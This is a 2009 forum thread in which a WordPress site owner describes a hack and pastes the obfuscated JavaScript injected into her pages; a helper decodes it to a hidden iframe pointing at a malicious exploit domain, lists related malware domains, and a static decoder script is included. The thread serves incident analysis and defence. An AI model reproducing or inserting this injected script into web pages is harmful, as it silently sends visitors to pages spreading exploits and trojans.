Author Topic: Malware on my site - added folder "rreeqs" and wp-config.php.mar04


March 31, 2009, 06:44:04 am

MShelby

site is www.melissashelby.com

Received a malware warning when pulling it up 4 days ago. Looks like the problem might have happened while I was using the wordpress basic uploader for photos. The day the malware message showed up, several of the uploaded photos started showing up blank with a question mark. The folder they were uploaded into no longer had my site's UID. The files that were blank also had the same invalid site id.

In addition, a folder labelled rreeqs was added to my site with a bunch of trash that looked like hundreds of stupid links. A file labelled wp-config.php.mar04 was also created and had my password, etc., in it. Every single one of my htm files and my valid wp-config.php file had a bogus js string added to them. I deleted all the js. Tech support - several hours later - was able to delete rreeqs (which I couldn't) and convert the UID on my upload folder back to the correct UID. In addition, I decided it was time to clean up a bunch of unnecessary files/folders/domains that I didn't use.

Next morning, the host is down for maintenance for several hours. When they come back up, it's like my site has been reverted back to where it was the previous day. All the clean up of unnecessary files is undone. Rreeqs and wp-config.php.mar04 and the bad UID are back. The only place I found the bad js string, however, was in my wp-config.php. I did not have to reclean all of the other files. I had changed my passwords the night before, so the wp-config.php.mar04 had the old password instead of the new one.

3 days later and I am still waiting on tech support to acknowledge my trouble ticket and at least respond to me. I want those files off my domain and can't do it myself. Or can I? Any ideas on what it is? Do you think my suspicion is correct that it came through the wordpress basic uploader, or am I way off on that?

Thanks

March 31, 2009, 12:19:17 pm
Reply #1

sowhat-x

As far as I know, there doesn't exist in public an exploit for WordPress 2.7.1... you should check the logs during the time of the incident in order to see how they broke in,
as I seriously doubt it came through the wordpress basic uploader... is it possible that your wp-config.php was somehow readable/in public view in the first place?
On a side note, would you mind posting the malicious js code here / the url it was linking to?...
I've also sent you a pm...

March 31, 2009, 03:42:48 pm
Reply #2

MShelby

The bad js was:

<!-- ad --><SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.2">document.write(''+unescape('%3C%69%66%72')+String.fromCharCode(97)+String.fromCharCode(109)+''+'e id'+'="'+String.fromCharCode(50)+String.fromCharCode(98)+String.fromCharCode(97)+''+String.fromCharCode(52)+String.fromCharCode(50)+String.fromCharCode(98)+''+'d'+String.fromCharCode(102)+String.fromCharCode(97)+''+String.fromCharCode(97)+''+unescape('%32%34%35')+String.fromCharCode(100)+String.fromCharCode(52)+String.fromCharCode(48)+''+String.fromCharCode(101)+String.fromCharCode(52)+''+unescape('%61%32%37%37')+'b71'+unescape('%66%33%31')+unescape('%38')+'487"'+' na'+'me="'+'b4d3'+String.fromCharCode(52)+String.fromCharCode(100)+String.fromCharCode(57)+''+unescape('%31%30')+'d'+String.fromCharCode(54)+String.fromCharCode(52)+String.fromCharCode(52)+String.fromCharCode(56)+''+String.fromCharCode(101)+String.fromCharCode(49)+String.fromCharCode(100)+String.fromCharCode(97)+''+'7eb'+unescape('%35%61%34%37')+unescape('%66%62')+String.fromCharCode(102)+''+String.fromCharCode(57)+''+String.fromCharCode(97)+String.fromCharCode(54)+String.fromCharCode(102)+''+'"  w'+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+''+unescape('%3D%31%20%68')+String.fromCharCode(101)+String.fromCharCode(105)+''+unescape('%67%68%74')+unescape('%3D%31%20%66'<script> 
eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C100%2C97%2C115%2C114%2C101%2C116%2C111%2C107%2C102%2C105%2C110%2C46%2C99%2C111%2C109%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C108%2C97%2C121%2C58%2C110%2C111%2C110%2C101%2C59%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));</script>

The rreeqs folder has been successfully deleted from my site and I don't have any record of the urls that were listed in it.

Thanks for the info! I was actually using wordpress 2.7 and hadn't upgraded yet to .1. I have now! The file wp-config.php.mar04 was definitely readable, as it was just like a txt file or something and spit out verbatim what my wp-config.php file had in it.

March 31, 2009, 03:58:29 pm
Reply #3

sowhat-x

Thanks Melissa - a kind of quick'n'dirty decoding of it shows the injection was pointing to the following malicious url/domain:
hxxp://dasretokfin.com/index.php
The aforementioned domain was spotted around a few days ago as well; it's spreading pdf exploits and "Waledac" trojans...
http://www.malwaredomainlist.com/mdl.php?search=dasretokfin.com&colsearch=All&quantity=50
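A static decoder for the two obfuscation styles quoted above, added here as an example and not something posted in the thread: it rewrites unescape(), String.fromCharCode() and string concatenation into plain literals and peels the eval()/document.write() wrappers without ever running the script, then reports the iframe target defanged. SAMPLE is the second injected block copied from the post; the function and regex names are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample: the second injected <script> body quoted above, without its tags.
SAMPLE = (
    'eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101'
    '%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47'
    '%2C100%2C97%2C115%2C114%2C101%2C116%2C111%2C107%2C102%2C105%2C110'
    '%2C46%2C99%2C111%2C109%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34'
    '%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34'
    '%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34'
    '%2C100%2C105%2C115%2C112%2C108%2C97%2C121%2C58%2C110%2C111%2C110%2C101%2C59%2C34%2C62'
    '%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));'
)

_LIT = r"'((?:[^'\\]|\\.)*)'"                        # one single-quoted JS string literal
_UNESCAPE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
_CHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d,\s]*)\)")
_CONCAT = re.compile(_LIT + r"\s*\+\s*" + _LIT)        # 'a' + 'b'
_UNWRAP = re.compile(r"(?:eval|document\.write)\(\s*" + _LIT + r"\s*\)")
_SRC = re.compile(r"""<iframe[^>]*\bsrc\s*=\s*["']([^"']+)["']""", re.I)

def _lit(s):    # re-emit decoded text as a single-quoted literal
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"

def _unlit(s):  # undo the escapes _lit (and JS) put inside a literal
    return re.sub(r"\\(.)", r"\1", s)

def _js_unescape(s):  # JS unescape(): %uXXXX code units first, then %XX bytes
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def decode(js, max_rounds=50):
    """Rewrite the encoding primitives into literals until nothing changes; never executes the JS."""
    for _ in range(max_rounds):
        new = _UNESCAPE.sub(lambda m: _lit(_js_unescape(m.group(2))), js)
        new = _UNWRAP.sub(lambda m: _unlit(m.group(1)), new)      # peel eval('..') / document.write('..')
        new = _CHARCODE.sub(lambda m: _lit("".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())), new)
        new = _CONCAT.sub(lambda m: _lit(_unlit(m.group(1)) + _unlit(m.group(2))), new)
        if new == js:
            break
        js = new
    return js.strip().rstrip(";")

def injected_urls(js):
    """Iframe targets found after decoding, defanged (hxxp) the way the thread quotes them."""
    return [re.sub(r"^http", "hxxp", u, flags=re.I) for u in _SRC.findall(decode(js))]
```

The same decoder collapses the first-style snippet (`''+unescape(...)+String.fromCharCode(...)+...`) by merging neighbouring literals one round at a time.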

March 31, 2009, 04:03:01 pm
Reply #4

sowhat-x

For the record, all domains on the same IP host malware/exploits etc...
http://www.bfk.de/bfk_dnslogger.html?query=95.129.144.228#result

tochtonenado.com was already spotted and added to our list; here's one we had missed though...
hxxp://5rublei.com/unique/?a

March 31, 2009, 09:27:57 pm
Reply #5

SysAdMini

Ruining the bad guy's day